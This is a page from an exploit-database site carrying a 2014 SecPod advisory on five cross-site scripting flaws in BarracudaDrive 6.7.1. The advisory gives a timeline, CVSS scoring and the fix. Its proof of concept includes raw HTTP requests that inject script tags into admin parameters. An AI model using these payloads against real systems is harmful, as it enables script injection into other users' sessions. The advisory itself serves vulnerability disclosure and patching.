0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BarracudaDrive 6.7.1 Cross Site Scripting Vulnerability
############################################################################### # # Title : BarracudaDrive Multiple XSS Vulnerabilities # Author : Shakeel Bhat SecPod Technologies Pvt. Ltd. http://www.secpod.com # Vendor : http://barracudadrive.com # Advisory : http://secpod.org/blog/?p=2309 # http://secpod.org/advisories/SecPod_Advistory_BarracudaDrive_6.7.1_Mult_XSS_Vuln.txt # Software : BarracudaDrive 6.7.1 # Date : 20/03/2014 # ############################################################################## SecPod ID: 1052 20/03/2014 Issue Discovered 25/03/2014 Vendor Notified 26/03/2014 Vendor Responded 27/03/2014 Vendor Solution 28/04/2014 Advisory Released Class: Cross-Site Scripting Severity: Medium Overview: --------- BarracudaDrive Multiple Reflected (1,3) and Persistent(2,4,5) Cross-site Scripting Vulnerabilities. Technical Description: ---------------------- Multiple Reflected and Persistent Cross-Site Scripting vulnerabilities are present in BarracudaDrive, as it fails to properly sanitize user-supplied input. 1) Input passed via the 'role' parameter to 'protected/admin/roles.lsp' is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. 2) Input passed via the 'name' parameter to '/admin/user.lsp' is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. 3) Input passed via the 'path' parameter in '/rtl/protected/admin/wizard/setuser.lsp' is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. 4) Input passed via the 'host' parameter in '/admin/tunnelconstr.lsp' is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. 5) Input passed via the 'newpath' parameter in 'protected/admin/wfsconstr.lsp' is not properly verified before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. The vulnerability has been tested in BarracudaDrive 6.7.1, Other versions may also be affected. Impact: -------- Successful exploitation allows an authenticated attacker to execute arbitrary HTML and script code in a user's browser session in the context of a vulnerable site. Affected Software: ------------------ BarracudaDrive 6.7.1 Tested on, BarracudaDrive 6.7.1 on Windows OS References: ----------- http://secpod.org/blog/?p=2309 http://secpod.org/advisories/SecPod_Advistory_BarracudaDrive_6.7.1_Mult_XSS_Vuln.txt Proof of Concept: 1) localhost/rtl/protected/admin/roles.lsp?role=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E 2) POST /rtl/protected/admin/user.lsp Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/rtl/protected/admin/user.lsp Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 80 POSTDATA: name=<script>alert("xss1")</script>&pwd=erterter&inactive=20&maxUsers=3&recycle=true&pwdl=false&info= 3) POST /rtl/protected/admin/wizard/setuser.lsp Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/rtl/protected/admin/wizard/setuser.lsp Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 40 POSTDATA user=abc&password=def&path=<script>alert("xss")</script> 4) POST /rtl/protected/admin/tunnelconstr.lsp Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/rtl/protected/admin/tunnelconstr.lsp? Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 53 POSTDATA constr=&host=<script>alert("xss")</script>&port=22&commonports=&pathsub=Add 5) POST /rtl/protected/admin/wfsconstr.lsp Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 101 POSTDATA basepath=&constr=qw&pathsub=abc&newpath=<script>alert("XSS")</script>&GET=on&PROPFIND=on&readaccess=on Solution: ------- Upgrade to BarracudaDrive version 6.7.2 Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR = NETWORK ACCESS_COMPLEXITY = MEDIUM AUTHENTICATION = SINGLE INSTANCE CONFIDENTIALITY_IMPACT = NONE INTEGRITY_IMPACT = PARTIAL AVAILABILITY_IMPACT = NONE EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL = UNAVAILABLE REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 3.5 (AV:N/AC:M/Au:SI/C:N/I:P/A:N) CVSS Temporal Score = 3.1 Risk factor = Medium Credits: -------- Shakeel Bhat of SecPod Technologies has been credited with the discovery of this vulnerability. # 0day.today [2024-10-05] #